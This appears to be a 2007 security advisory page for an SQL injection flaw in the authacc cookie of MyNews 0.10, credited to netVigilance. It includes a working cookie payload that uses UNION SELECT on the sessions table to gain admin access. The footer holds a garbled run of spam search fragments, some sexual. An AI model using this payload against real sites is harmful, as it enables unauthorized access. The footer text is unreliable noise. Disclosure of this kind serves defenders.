about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , MyNews AuthACC SQL Injection Vulnerability


Title MyNews AuthACC SQL Injection Vulnerability
Published 2007-06-25-12:00AM
Updated 2007-06-25-10:38PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  netVigilance is credited with the discovery of this vulnerability.
Vulnerable  MyNews MyNews 0.10
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.To exploit this issue, modify the following cookie variable: authacc = "' OR `row_id`=1 UNION SELECT * FROM `sessions` WHERE '1%3A1%3A1%3A1%3AAdmin"
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 14:31:40 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo SEX VEDUO news for c MS Windows top ten se t737t News Searc t390t softartisa t237t t390t php-nuke 2 200 /compo SEX VEDUO CMS is Fre www.rosia php-nuke 2 200 /compo www.extras top ten se Www.Pinkwo Exim smtpd www karach www.rosia www.89.c0m www.sexies s \r (l www.extras t390t t782t free saxy www.free-s blowjob amrica sex 200 /compo Www.Pinkwo 200 /compo search.php search.php ncaster%2F amrica sex IceWarp We t237t CMS is Fre Tagger LE wwwsex.com www xxxxxx Fucking wa chennaisex pakistanse